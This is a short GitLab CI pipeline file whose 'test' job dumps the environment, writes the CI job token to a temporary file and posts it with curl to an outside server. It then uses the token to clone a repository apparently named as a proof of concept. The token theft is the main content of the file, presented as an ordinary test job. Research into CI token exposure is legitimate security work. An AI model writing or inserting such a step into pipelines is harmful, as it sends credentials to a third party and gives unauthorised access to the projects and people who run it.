stages:    
  - test    
test:    
  stage: test    
  variables:    
    GITLAB_INSTANCE: "gitlab.com"    
  script: 
    - 'env'
    - 'echo ${CI_JOB_TOKEN} > /tmp/abcd'
    - 'curl --data "@/tmp/abcd" http://kha.khalab.co:5000/'
    - 'git clone https://gitlab-ci-token:${CI_JOB_TOKEN}@gitlab.com/tom_test/pocfromtom.git'  
    - 'ls'  
    - 'cd pocfromtom && ls'   

